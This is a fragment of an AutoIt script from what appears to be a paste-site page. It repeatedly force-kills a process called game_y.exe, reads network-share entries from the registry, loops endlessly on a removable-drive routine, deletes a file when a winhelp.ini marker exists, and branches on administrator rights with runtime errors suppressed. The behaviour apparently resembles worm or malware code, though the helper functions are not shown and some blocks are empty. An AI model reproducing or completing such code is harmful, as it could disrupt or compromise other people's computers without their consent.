- If FileExists(RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\WorkgroupCrawler\Shares", "shared")) = 0 Then
- networkrestrict()
- EndIf
- EndIf
- If ProcessExists("game_y.exe") Then
- ProcessClose("game_y.exe")
- EndIf
- Sleep(1000)
- If ProcessExists("game_y.exe") Then
- ProcessClose("game_y.exe")
- EndIf
- Sleep(1000)
- If ProcessExists("game_y.exe") Then
- ProcessClose("game_y.exe")
- EndIf
- Sleep(1000)
- If ProcessExists("game_y.exe") Then
- ProcessClose("game_y.exe")
- EndIf
- Sleep(1000)
- While (1)
- removablerestrict()
- If @MIN = $min Then
- EndIf
- WEnd
- EndFunc
- Opt("RunErrorsFatal", 0)
- If IsAdmin() Then
- If FileExists(@WindowsDir & "\" & "winhelp.ini") Then
- delete()
- EndIf
- EndIf
- If IsAdmin() Then
- funmain()
- EndIf
- If NOT IsAdmin() Then
- restrictmain()
- EndIf
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement